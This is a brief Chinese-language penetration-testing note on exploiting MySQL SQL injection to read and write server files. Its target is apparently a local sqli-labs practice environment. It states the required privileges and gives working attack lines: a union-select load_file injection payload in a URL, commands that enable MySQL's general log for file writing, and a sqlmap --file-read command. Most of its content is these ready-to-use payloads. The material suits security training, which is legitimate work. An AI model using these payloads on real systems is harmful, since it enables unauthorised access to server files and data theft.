
*****
## MySQL注入讀寫文件
MySQL數據庫在滲透過程中能夠使用的功能還是比較多的,除了讀取數據之外,還可以進行 對文件進行讀寫(前提是權限足夠)
<br>讀取前提:
1.用戶權限足夠高,盡量具有root權限
2.secure\_file\_priv不為null
### 讀取文件內容
```
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('D:\\1.txt'),3 --+
```
### 開啟MySQL文件寫入
```
show variables like '%general%'; # 默認是關閉的
set global general\_log = on;
```
### 利用sqlmap進行讀寫文件
```
python sqlmap.py -u "http://127.0.0.1/sqli/Less-7/?id=1" --file-read "D:\\\\1.txt"
```